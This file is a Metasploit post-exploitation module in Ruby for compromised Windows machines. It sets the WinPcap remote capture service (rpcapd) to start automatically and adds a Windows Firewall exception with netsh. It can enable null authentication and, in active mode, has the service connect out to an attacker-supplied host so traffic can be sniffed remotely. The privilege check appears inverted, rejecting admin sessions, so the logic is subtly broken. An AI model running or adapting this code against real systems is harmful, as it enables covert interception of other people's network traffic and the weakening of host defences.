1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::Registry
9
  include Msf::Post::Windows::Services
10
  include Msf::Post::Windows::Priv
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Windows Manage Remote Packet Capture Service Starter',
17
        'Description' => %q{
18
          This module enables the Remote Packet Capture System (rpcapd service)
19
          included in the default installation of Winpcap. The module allows you to set up
20
          the service in passive or active mode (useful if the client is behind a firewall).
21
          If authentication is enabled you need a local user account to capture traffic.
22
          PORT will be used depending of the mode configured.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
26
        'Platform' => 'win',
27
        'SessionTypes' => [ 'meterpreter' ],
28
        'Notes' => {
29
          'Stability' => [CRASH_SAFE],
30
          'SideEffects' => [],
31
          'Reliability' => []
32
        }
33
      )
34
    )
35

36
    register_options(
37
      [
38
        OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
39
        OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
40
        OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
41
        OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.', 2002])
42
      ]
43
    )
44
  end
45

46
  def run
47
    if is_admin?
48
      print_error("You don't have enough privileges. Try getsystem.")
49
      return
50
    end
51

52
    serv = service_info('rpcapd')
53
    print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
54

55
    if serv[:display] !~ /remote/i
56
      print_error("This machine doesn't seem to have the rpcapd service")
57
      return
58
    end
59

60
    print_status("Rpcap service found: #{serv[:display]}")
61

62
    start_type = serv[:starttype]
63
    prog = get_env('ProgramFiles') << '\\winpcap\\rpcapd.exe'
64
    if start_type != START_TYPE_AUTO
65
      print_status("Setting rpcapd as 'auto' service")
66
      service_change_startup('rpcapd', START_TYPE_AUTO)
67
    end
68

69
    if datastore['ACTIVE']
70
      if datastore['RHOST'].nil?
71
        print_error('RHOST is not set ')
72
        return
73
      end
74
      p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
75
      print_status("Installing rpcap in ACTIVE mode (remote port: #{datastore['PORT']})")
76
    else
77
      fw_enable(prog)
78
      print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ")
79
      p = prog << " -d -p #{datastore['PORT']} "
80
    end
81

82
    if datastore['NULLAUTH']
83
      p << '-n'
84
    end
85

86
    run_rpcapd(p)
87
  end
88

89
  def run_rpcapd(cmdline)
90
    service_name = 'rpcapd'
91
    if service_restart(service_name)
92
      print_good("Rpcapd started successfully: #{cmdline}")
93
    else
94
      print_error('There was an error restarting rpcapd.exe.')
95
    end
96
  rescue StandardError => e
97
    print_error("The following error was encountered: #{e.class} #{e}")
98
  end
99

100
  def fw_enable(prog)
101
    print_status('Enabling rpcapd.exe in Windows Firewall')
102
    if file_exist?(prog)
103
      cmd_exec('netsh', "firewall add allowedprogram \"#{prog}\" \"Windows Service\" ENABLE ", 30)
104
    else
105
      print_error("rpcad.exe doesn't exist in #{prog}. Check the installation of WinPcap")
106
    end
107
  rescue StandardError => e
108
    print_status("The following error was encountered: #{e.class} #{e}")
109
  end
110
end
111

112